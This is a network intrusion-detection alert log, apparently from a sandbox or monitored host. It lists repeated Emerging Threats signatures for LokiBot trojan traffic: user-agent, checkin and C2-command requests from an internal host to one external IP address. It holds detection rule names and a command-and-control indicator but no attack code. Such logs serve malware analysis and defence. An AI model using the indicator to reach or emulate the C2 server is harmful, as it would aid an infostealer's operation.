11/25/21-10:52:55.566183	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50407	80	192.168.11.20	176.223.209.128
11/25/21-10:52:55.566183	TCP	2025381	ET TROJAN LokiBot Checkin	50407	80	192.168.11.20	176.223.209.128
11/25/21-10:52:55.566183	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50407	80	192.168.11.20	176.223.209.128
11/25/21-10:52:56.047377	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50408	80	192.168.11.20	176.223.209.128
11/25/21-10:52:56.047377	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50408	80	192.168.11.20	176.223.209.128
11/25/21-10:52:56.047377	TCP	2025381	ET TROJAN LokiBot Checkin	50408	80	192.168.11.20	176.223.209.128
11/25/21-10:52:56.047377	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50408	80	192.168.11.20	176.223.209.128
11/25/21-10:52:56.526257	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50409	80	192.168.11.20	176.223.209.128
11/25/21-10:52:56.526257	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50409	80	192.168.11.20	176.223.209.128
11/25/21-10:52:56.526257	TCP	2025381	ET TROJAN LokiBot Checkin	50409	80	192.168.11.20	176.223.209.128
11/25/21-10:52:56.526257	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50409	80	192.168.11.20	176.223.209.128
11/25/21-10:52:57.024559	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50410	80	192.168.11.20	176.223.209.128
11/25/21-10:52:57.024559	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50410	80	192.168.11.20	176.223.209.128
11/25/21-10:52:57.024559	TCP	2025381	ET TROJAN LokiBot Checkin	50410	80	192.168.11.20	176.223.209.128
11/25/21-10:52:57.024559	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50410	80	192.168.11.20	176.223.209.128
11/25/21-10:52:57.529845	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50411	80	192.168.11.20	176.223.209.128
11/25/21-10:52:57.529845	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50411	80	192.168.11.20	176.223.209.128
11/25/21-10:52:57.529845	TCP	2025381	ET TROJAN LokiBot Checkin	50411	80	192.168.11.20	176.223.209.128
11/25/21-10:52:57.529845	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50411	80	192.168.11.20	176.223.209.128
11/25/21-10:52:58.031683	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50412	80	192.168.11.20	176.223.209.128
11/25/21-10:52:58.031683	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50412	80	192.168.11.20	176.223.209.128
11/25/21-10:52:58.031683	TCP	2025381	ET TROJAN LokiBot Checkin	50412	80	192.168.11.20	176.223.209.128
11/25/21-10:52:58.031683	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50412	80	192.168.11.20	176.223.209.128
11/25/21-10:52:58.610007	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50413	80	192.168.11.20	176.223.209.128
11/25/21-10:52:58.610007	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50413	80	192.168.11.20	176.223.209.128
11/25/21-10:52:58.610007	TCP	2025381	ET TROJAN LokiBot Checkin	50413	80	192.168.11.20	176.223.209.128
11/25/21-10:52:58.610007	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50413	80	192.168.11.20	176.223.209.128
11/25/21-10:52:59.074621	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50414	80	192.168.11.20	176.223.209.128
11/25/21-10:52:59.074621	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50414	80	192.168.11.20	176.223.209.128
11/25/21-10:52:59.074621	TCP	2025381	ET TROJAN LokiBot Checkin	50414	80	192.168.11.20	176.223.209.128
11/25/21-10:52:59.074621	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50414	80	192.168.11.20	176.223.209.128
11/25/21-10:52:59.567879	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50415	80	192.168.11.20	176.223.209.128
11/25/21-10:52:59.567879	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50415	80	192.168.11.20	176.223.209.128
11/25/21-10:52:59.567879	TCP	2025381	ET TROJAN LokiBot Checkin	50415	80	192.168.11.20	176.223.209.128
11/25/21-10:52:59.567879	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50415	80	192.168.11.20	176.223.209.128
11/25/21-10:53:00.086672	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50416	80	192.168.11.20	176.223.209.128
11/25/21-10:53:00.086672	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50416	80	192.168.11.20	176.223.209.128
11/25/21-10:53:00.086672	TCP	2025381	ET TROJAN LokiBot Checkin	50416	80	192.168.11.20	176.223.209.128
11/25/21-10:53:00.086672	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50416	80	192.168.11.20	176.223.209.128
11/25/21-10:53:00.611075	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50417	80	192.168.11.20	176.223.209.128
11/25/21-10:53:00.611075	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50417	80	192.168.11.20	176.223.209.128
11/25/21-10:53:00.611075	TCP	2025381	ET TROJAN LokiBot Checkin	50417	80	192.168.11.20	176.223.209.128
11/25/21-10:53:00.611075	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50417	80	192.168.11.20	176.223.209.128
11/25/21-10:53:01.130911	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50418	80	192.168.11.20	176.223.209.128
11/25/21-10:53:01.130911	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50418	80	192.168.11.20	176.223.209.128
11/25/21-10:53:01.130911	TCP	2025381	ET TROJAN LokiBot Checkin	50418	80	192.168.11.20	176.223.209.128
11/25/21-10:53:01.130911	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50418	80	192.168.11.20	176.223.209.128
11/25/21-10:53:01.578296	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50419	80	192.168.11.20	176.223.209.128
11/25/21-10:53:01.578296	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50419	80	192.168.11.20	176.223.209.128
11/25/21-10:53:01.578296	TCP	2025381	ET TROJAN LokiBot Checkin	50419	80	192.168.11.20	176.223.209.128
11/25/21-10:53:01.578296	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50419	80	192.168.11.20	176.223.209.128
11/25/21-10:53:02.060783	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50420	80	192.168.11.20	176.223.209.128
11/25/21-10:53:02.060783	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50420	80	192.168.11.20	176.223.209.128
11/25/21-10:53:02.060783	TCP	2025381	ET TROJAN LokiBot Checkin	50420	80	192.168.11.20	176.223.209.128
11/25/21-10:53:02.060783	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50420	80	192.168.11.20	176.223.209.128
11/25/21-10:53:02.537939	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50421	80	192.168.11.20	176.223.209.128
11/25/21-10:53:02.537939	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50421	80	192.168.11.20	176.223.209.128
11/25/21-10:53:02.537939	TCP	2025381	ET TROJAN LokiBot Checkin	50421	80	192.168.11.20	176.223.209.128
11/25/21-10:53:02.537939	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50421	80	192.168.11.20	176.223.209.128
11/25/21-10:53:03.009358	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50422	80	192.168.11.20	176.223.209.128
11/25/21-10:53:03.009358	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50422	80	192.168.11.20	176.223.209.128
11/25/21-10:53:03.009358	TCP	2025381	ET TROJAN LokiBot Checkin	50422	80	192.168.11.20	176.223.209.128
11/25/21-10:53:03.009358	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50422	80	192.168.11.20	176.223.209.128
11/25/21-10:53:03.550200	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50423	80	192.168.11.20	176.223.209.128
11/25/21-10:53:03.550200	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50423	80	192.168.11.20	176.223.209.128
11/25/21-10:53:03.550200	TCP	2025381	ET TROJAN LokiBot Checkin	50423	80	192.168.11.20	176.223.209.128
11/25/21-10:53:03.550200	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50423	80	192.168.11.20	176.223.209.128
11/25/21-10:53:04.065980	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50424	80	192.168.11.20	176.223.209.128
11/25/21-10:53:04.065980	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50424	80	192.168.11.20	176.223.209.128
11/25/21-10:53:04.065980	TCP	2025381	ET TROJAN LokiBot Checkin	50424	80	192.168.11.20	176.223.209.128
11/25/21-10:53:04.065980	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50424	80	192.168.11.20	176.223.209.128
11/25/21-10:53:04.540647	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50425	80	192.168.11.20	176.223.209.128
11/25/21-10:53:04.540647	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50425	80	192.168.11.20	176.223.209.128
11/25/21-10:53:04.540647	TCP	2025381	ET TROJAN LokiBot Checkin	50425	80	192.168.11.20	176.223.209.128
11/25/21-10:53:04.540647	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50425	80	192.168.11.20	176.223.209.128
11/25/21-10:53:04.999029	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50426	80	192.168.11.20	176.223.209.128
11/25/21-10:53:04.999029	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50426	80	192.168.11.20	176.223.209.128
11/25/21-10:53:04.999029	TCP	2025381	ET TROJAN LokiBot Checkin	50426	80	192.168.11.20	176.223.209.128
11/25/21-10:53:04.999029	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50426	80	192.168.11.20	176.223.209.128
11/25/21-10:53:05.526148	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50427	80	192.168.11.20	176.223.209.128
11/25/21-10:53:05.526148	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50427	80	192.168.11.20	176.223.209.128
11/25/21-10:53:05.526148	TCP	2025381	ET TROJAN LokiBot Checkin	50427	80	192.168.11.20	176.223.209.128
11/25/21-10:53:05.526148	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50427	80	192.168.11.20	176.223.209.128
11/25/21-10:53:06.040957	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50428	80	192.168.11.20	176.223.209.128
11/25/21-10:53:06.040957	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50428	80	192.168.11.20	176.223.209.128
11/25/21-10:53:06.040957	TCP	2025381	ET TROJAN LokiBot Checkin	50428	80	192.168.11.20	176.223.209.128
11/25/21-10:53:06.040957	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50428	80	192.168.11.20	176.223.209.128
11/25/21-10:53:06.546834	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50429	80	192.168.11.20	176.223.209.128
11/25/21-10:53:06.546834	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50429	80	192.168.11.20	176.223.209.128
11/25/21-10:53:06.546834	TCP	2025381	ET TROJAN LokiBot Checkin	50429	80	192.168.11.20	176.223.209.128
11/25/21-10:53:06.546834	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50429	80	192.168.11.20	176.223.209.128
11/25/21-10:53:07.053704	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50430	80	192.168.11.20	176.223.209.128
11/25/21-10:53:07.053704	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50430	80	192.168.11.20	176.223.209.128
11/25/21-10:53:07.053704	TCP	2025381	ET TROJAN LokiBot Checkin	50430	80	192.168.11.20	176.223.209.128
11/25/21-10:53:07.053704	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50430	80	192.168.11.20	176.223.209.128
11/25/21-10:53:07.512223	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50431	80	192.168.11.20	176.223.209.128
11/25/21-10:53:07.512223	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50431	80	192.168.11.20	176.223.209.128
11/25/21-10:53:07.512223	TCP	2025381	ET TROJAN LokiBot Checkin	50431	80	192.168.11.20	176.223.209.128
11/25/21-10:53:07.512223	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50431	80	192.168.11.20	176.223.209.128
11/25/21-10:53:08.018557	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50432	80	192.168.11.20	176.223.209.128
11/25/21-10:53:08.018557	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50432	80	192.168.11.20	176.223.209.128
11/25/21-10:53:08.018557	TCP	2025381	ET TROJAN LokiBot Checkin	50432	80	192.168.11.20	176.223.209.128
11/25/21-10:53:08.018557	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50432	80	192.168.11.20	176.223.209.128
11/25/21-10:53:08.530988	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50433	80	192.168.11.20	176.223.209.128
11/25/21-10:53:08.530988	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50433	80	192.168.11.20	176.223.209.128
11/25/21-10:53:08.530988	TCP	2025381	ET TROJAN LokiBot Checkin	50433	80	192.168.11.20	176.223.209.128
11/25/21-10:53:08.530988	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50433	80	192.168.11.20	176.223.209.128
11/25/21-10:53:09.043355	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50434	80	192.168.11.20	176.223.209.128
11/25/21-10:53:09.043355	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50434	80	192.168.11.20	176.223.209.128
11/25/21-10:53:09.043355	TCP	2025381	ET TROJAN LokiBot Checkin	50434	80	192.168.11.20	176.223.209.128
11/25/21-10:53:09.043355	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50434	80	192.168.11.20	176.223.209.128
11/25/21-10:53:09.554097	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50435	80	192.168.11.20	176.223.209.128
11/25/21-10:53:09.554097	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50435	80	192.168.11.20	176.223.209.128
11/25/21-10:53:09.554097	TCP	2025381	ET TROJAN LokiBot Checkin	50435	80	192.168.11.20	176.223.209.128
11/25/21-10:53:09.554097	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50435	80	192.168.11.20	176.223.209.128
11/25/21-10:53:10.015600	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50436	80	192.168.11.20	176.223.209.128
11/25/21-10:53:10.015600	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50436	80	192.168.11.20	176.223.209.128
11/25/21-10:53:10.015600	TCP	2025381	ET TROJAN LokiBot Checkin	50436	80	192.168.11.20	176.223.209.128
11/25/21-10:53:10.015600	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50436	80	192.168.11.20	176.223.209.128
11/25/21-10:53:10.527559	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50437	80	192.168.11.20	176.223.209.128
11/25/21-10:53:10.527559	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50437	80	192.168.11.20	176.223.209.128
11/25/21-10:53:10.527559	TCP	2025381	ET TROJAN LokiBot Checkin	50437	80	192.168.11.20	176.223.209.128
11/25/21-10:53:10.527559	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50437	80	192.168.11.20	176.223.209.128
11/25/21-10:53:11.042169	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50438	80	192.168.11.20	176.223.209.128
11/25/21-10:53:11.042169	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50438	80	192.168.11.20	176.223.209.128
11/25/21-10:53:11.042169	TCP	2025381	ET TROJAN LokiBot Checkin	50438	80	192.168.11.20	176.223.209.128
11/25/21-10:53:11.042169	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50438	80	192.168.11.20	176.223.209.128
11/25/21-10:53:11.544618	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50439	80	192.168.11.20	176.223.209.128
11/25/21-10:53:11.544618	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50439	80	192.168.11.20	176.223.209.128
11/25/21-10:53:11.544618	TCP	2025381	ET TROJAN LokiBot Checkin	50439	80	192.168.11.20	176.223.209.128
11/25/21-10:53:11.544618	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50439	80	192.168.11.20	176.223.209.128
11/25/21-10:53:12.051973	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50440	80	192.168.11.20	176.223.209.128
11/25/21-10:53:12.051973	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50440	80	192.168.11.20	176.223.209.128
11/25/21-10:53:12.051973	TCP	2025381	ET TROJAN LokiBot Checkin	50440	80	192.168.11.20	176.223.209.128
11/25/21-10:53:12.051973	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50440	80	192.168.11.20	176.223.209.128
11/25/21-10:53:12.567729	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50441	80	192.168.11.20	176.223.209.128
11/25/21-10:53:12.567729	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50441	80	192.168.11.20	176.223.209.128
11/25/21-10:53:12.567729	TCP	2025381	ET TROJAN LokiBot Checkin	50441	80	192.168.11.20	176.223.209.128
11/25/21-10:53:12.567729	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50441	80	192.168.11.20	176.223.209.128
11/25/21-10:53:13.013848	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50442	80	192.168.11.20	176.223.209.128
11/25/21-10:53:13.013848	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50442	80	192.168.11.20	176.223.209.128
11/25/21-10:53:13.013848	TCP	2025381	ET TROJAN LokiBot Checkin	50442	80	192.168.11.20	176.223.209.128
11/25/21-10:53:13.013848	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50442	80	192.168.11.20	176.223.209.128
11/25/21-10:53:13.443385	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50443	80	192.168.11.20	176.223.209.128
11/25/21-10:53:13.443385	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50443	80	192.168.11.20	176.223.209.128
11/25/21-10:53:13.443385	TCP	2025381	ET TROJAN LokiBot Checkin	50443	80	192.168.11.20	176.223.209.128
11/25/21-10:53:13.443385	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50443	80	192.168.11.20	176.223.209.128
11/25/21-10:53:13.950038	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50444	80	192.168.11.20	176.223.209.128
11/25/21-10:53:13.950038	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50444	80	192.168.11.20	176.223.209.128
11/25/21-10:53:13.950038	TCP	2025381	ET TROJAN LokiBot Checkin	50444	80	192.168.11.20	176.223.209.128
11/25/21-10:53:13.950038	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50444	80	192.168.11.20	176.223.209.128
11/25/21-10:53:14.461542	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50445	80	192.168.11.20	176.223.209.128
11/25/21-10:53:14.461542	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50445	80	192.168.11.20	176.223.209.128
11/25/21-10:53:14.461542	TCP	2025381	ET TROJAN LokiBot Checkin	50445	80	192.168.11.20	176.223.209.128
11/25/21-10:53:14.461542	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50445	80	192.168.11.20	176.223.209.128
11/25/21-10:53:14.963607	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50446	80	192.168.11.20	176.223.209.128
11/25/21-10:53:14.963607	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50446	80	192.168.11.20	176.223.209.128
11/25/21-10:53:14.963607	TCP	2025381	ET TROJAN LokiBot Checkin	50446	80	192.168.11.20	176.223.209.128
11/25/21-10:53:14.963607	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50446	80	192.168.11.20	176.223.209.128
11/25/21-10:53:15.460895	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50447	80	192.168.11.20	176.223.209.128
11/25/21-10:53:15.460895	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50447	80	192.168.11.20	176.223.209.128
11/25/21-10:53:15.460895	TCP	2025381	ET TROJAN LokiBot Checkin	50447	80	192.168.11.20	176.223.209.128
11/25/21-10:53:15.460895	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50447	80	192.168.11.20	176.223.209.128
11/25/21-10:53:15.970796	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50448	80	192.168.11.20	176.223.209.128
11/25/21-10:53:15.970796	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50448	80	192.168.11.20	176.223.209.128
11/25/21-10:53:15.970796	TCP	2025381	ET TROJAN LokiBot Checkin	50448	80	192.168.11.20	176.223.209.128
11/25/21-10:53:15.970796	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50448	80	192.168.11.20	176.223.209.128
11/25/21-10:53:16.443543	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50449	80	192.168.11.20	176.223.209.128
11/25/21-10:53:16.443543	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50449	80	192.168.11.20	176.223.209.128
11/25/21-10:53:16.443543	TCP	2025381	ET TROJAN LokiBot Checkin	50449	80	192.168.11.20	176.223.209.128
11/25/21-10:53:16.443543	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50449	80	192.168.11.20	176.223.209.128
11/25/21-10:53:16.946928	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50450	80	192.168.11.20	176.223.209.128
11/25/21-10:53:16.946928	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50450	80	192.168.11.20	176.223.209.128
11/25/21-10:53:16.946928	TCP	2025381	ET TROJAN LokiBot Checkin	50450	80	192.168.11.20	176.223.209.128
11/25/21-10:53:16.946928	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50450	80	192.168.11.20	176.223.209.128
11/25/21-10:53:17.460876	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50451	80	192.168.11.20	176.223.209.128
11/25/21-10:53:17.460876	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50451	80	192.168.11.20	176.223.209.128
11/25/21-10:53:17.460876	TCP	2025381	ET TROJAN LokiBot Checkin	50451	80	192.168.11.20	176.223.209.128
11/25/21-10:53:17.460876	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50451	80	192.168.11.20	176.223.209.128
11/25/21-10:53:17.961556	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50452	80	192.168.11.20	176.223.209.128
11/25/21-10:53:17.961556	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50452	80	192.168.11.20	176.223.209.128
11/25/21-10:53:17.961556	TCP	2025381	ET TROJAN LokiBot Checkin	50452	80	192.168.11.20	176.223.209.128
11/25/21-10:53:17.961556	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50452	80	192.168.11.20	176.223.209.128
11/25/21-10:53:18.455844	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50453	80	192.168.11.20	176.223.209.128
11/25/21-10:53:18.455844	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50453	80	192.168.11.20	176.223.209.128
11/25/21-10:53:18.455844	TCP	2025381	ET TROJAN LokiBot Checkin	50453	80	192.168.11.20	176.223.209.128
11/25/21-10:53:18.455844	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50453	80	192.168.11.20	176.223.209.128
11/25/21-10:53:18.884130	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50454	80	192.168.11.20	176.223.209.128
11/25/21-10:53:18.884130	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50454	80	192.168.11.20	176.223.209.128
11/25/21-10:53:18.884130	TCP	2025381	ET TROJAN LokiBot Checkin	50454	80	192.168.11.20	176.223.209.128
11/25/21-10:53:18.884130	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50454	80	192.168.11.20	176.223.209.128
11/25/21-10:53:19.409172	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50455	80	192.168.11.20	176.223.209.128
11/25/21-10:53:19.409172	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50455	80	192.168.11.20	176.223.209.128
11/25/21-10:53:19.409172	TCP	2025381	ET TROJAN LokiBot Checkin	50455	80	192.168.11.20	176.223.209.128
11/25/21-10:53:19.409172	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50455	80	192.168.11.20	176.223.209.128
11/25/21-10:53:19.898078	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50456	80	192.168.11.20	176.223.209.128
11/25/21-10:53:19.898078	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50456	80	192.168.11.20	176.223.209.128
11/25/21-10:53:19.898078	TCP	2025381	ET TROJAN LokiBot Checkin	50456	80	192.168.11.20	176.223.209.128
11/25/21-10:53:19.898078	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50456	80	192.168.11.20	176.223.209.128
11/25/21-10:53:20.393989	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50458	80	192.168.11.20	176.223.209.128
11/25/21-10:53:20.393989	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50458	80	192.168.11.20	176.223.209.128
11/25/21-10:53:20.393989	TCP	2025381	ET TROJAN LokiBot Checkin	50458	80	192.168.11.20	176.223.209.128
11/25/21-10:53:20.393989	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50458	80	192.168.11.20	176.223.209.128
11/25/21-10:53:20.908345	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50459	80	192.168.11.20	176.223.209.128
11/25/21-10:53:20.908345	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50459	80	192.168.11.20	176.223.209.128
11/25/21-10:53:20.908345	TCP	2025381	ET TROJAN LokiBot Checkin	50459	80	192.168.11.20	176.223.209.128
11/25/21-10:53:20.908345	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50459	80	192.168.11.20	176.223.209.128
11/25/21-10:53:21.387957	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50460	80	192.168.11.20	176.223.209.128
11/25/21-10:53:21.387957	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50460	80	192.168.11.20	176.223.209.128
11/25/21-10:53:21.387957	TCP	2025381	ET TROJAN LokiBot Checkin	50460	80	192.168.11.20	176.223.209.128
11/25/21-10:53:21.387957	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50460	80	192.168.11.20	176.223.209.128
11/25/21-10:53:21.894494	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50461	80	192.168.11.20	176.223.209.128
11/25/21-10:53:21.894494	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50461	80	192.168.11.20	176.223.209.128
11/25/21-10:53:21.894494	TCP	2025381	ET TROJAN LokiBot Checkin	50461	80	192.168.11.20	176.223.209.128
11/25/21-10:53:21.894494	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50461	80	192.168.11.20	176.223.209.128
11/25/21-10:53:22.409035	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50462	80	192.168.11.20	176.223.209.128
11/25/21-10:53:22.409035	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50462	80	192.168.11.20	176.223.209.128
11/25/21-10:53:22.409035	TCP	2025381	ET TROJAN LokiBot Checkin	50462	80	192.168.11.20	176.223.209.128
